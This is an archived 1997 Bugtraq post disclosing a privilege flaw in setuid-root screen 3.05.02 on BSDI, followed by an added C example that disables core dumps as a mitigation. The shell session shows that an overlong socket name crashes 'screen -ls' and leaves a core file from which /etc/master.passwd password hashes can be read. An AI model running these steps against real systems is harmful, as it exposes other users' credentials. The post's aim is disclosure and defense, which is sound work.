Bugtraq mailing list archives
screen 3.05.02
From: khelbin () CONNIX COM (Khelbin Sunvold)
Date: Sat, 15 Feb 1997 21:46:54 -0500
The program under question is /usr/contrib/bin/screen (BSDI).  This is
screen version 3.05.02 and is installed setuid root, as it is "supposed"
to be.  Here is a demonstration:
$ screen
Screen version 3.05.02 (FAU) 19-Aug-93
Copyright (c) 1993 Juergen Weigert, Michael Schroeder
Copyright (c) 1987 Oliver Laumann
This program is free software; you can redistribute it and/or modify it under
the terms of the GNU General Public License as published by the Free Software
Foundation; either version 2, or (at your option) any later version.
This program is distributed in the hope that it will be useful, but WITHOUT
ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
You should have received a copy of the GNU General Public License along with
this program (see the file COPYING); if not, write to the Free Software
Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
Send bugreports, fixes, enhancements, t-shirts, money, beer & pizza to
screen () uni-erlangen de (bah.. send them to Bugtraq!)
                        [Press Space or Return to end.]
$ screen
$ cd /tmp/screens/S-khelbin
$ ls
246.ttyp7.comet
$ mv 246.ttyp* 246.ttyp7.cometanonymousanonymousanonymousanonymous\
anonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymous\
anonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymous
$ screen -ls
/tmp/screens/S-khelbin/246.ttyp7.cometanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymous: connect: Invalid argument
%1 278 Abort - core dumped screen -ls
$ ls -l
total 176
srwx------ 1 khelbin khelbin 0 Feb 15 21:33 246.ttyp7.cometanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymous
-rw-r--r-- 1 khelbin khelbin 172032 Feb 15 21:33 core.screen
$ strings core.screen|less

The core.screen file contains unencrypted password strings from
/etc/master.passwd, which, of course, should not be readable by me.  I'm
also sure there's a buffer-overflow here but I haven't had as much time as
I would like to look through the source yet.

-khelbin / 9x
email: khelbin () connix com
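A mitigation for the failure shown in this post, as an added example that is not part of the original message or of screen's source: a privileged process forbids core dumps before it handles secret data, and a forked child that aborts confirms that no core is written. The function names and the sample secret string are constructed for illustration.

```c
/* Added example: keep secrets held by a privileged process out of core files. */
#define _DEFAULT_SOURCE               /* glibc: expose WCOREDUMP */
#include <stdio.h>
#include <stdlib.h>
#include <sys/resource.h>
#include <sys/wait.h>
#include <unistd.h>
#ifdef __linux__
#include <sys/prctl.h>
#endif

/* Forbid core files for this process. Returns 0 on success, -1 on failure. */
int disable_core_dumps(void)
{
    struct rlimit rl = { 0, 0 };      /* soft and hard limit: 0 bytes */
    if (setrlimit(RLIMIT_CORE, &rl) != 0)
        return -1;
#ifdef __linux__
    /* Linux: a piped core_pattern handler is not bound by RLIMIT_CORE,
     * so clear the process's dumpable flag as well. */
    if (prctl(PR_SET_DUMPABLE, 0, 0, 0, 0) != 0)
        return -1;
#endif
    return 0;
}

/* Fork a child that holds a constructed secret and then aborts, as screen
 * did in the post. With harden != 0 the child disables core dumps first.
 * Returns 1 if the child dumped core, 0 if it did not, -1 on error. */
int child_dumps_core(int harden)
{
    int status;
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        volatile char secret[] = "root:CONSTRUCTED-HASH:0:0::/root:/bin/sh";
        (void)secret;
        if (harden && disable_core_dumps() != 0)
            _exit(2);                 /* refuse to continue unhardened */
        abort();                      /* SIGABRT: dumps core if allowed */
    }
    if (waitpid(pid, &status, 0) != pid || !WIFSIGNALED(status))
        return -1;
    return WCOREDUMP(status) ? 1 : 0;
}

int main(void)
{
    printf("hardened child dumped core: %d\n", child_dumps_core(1));
    return 0;
}
```

Calling `child_dumps_core(0)` shows the unhardened behaviour, which depends on the system's core limit and may leave a core file in the current directory.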
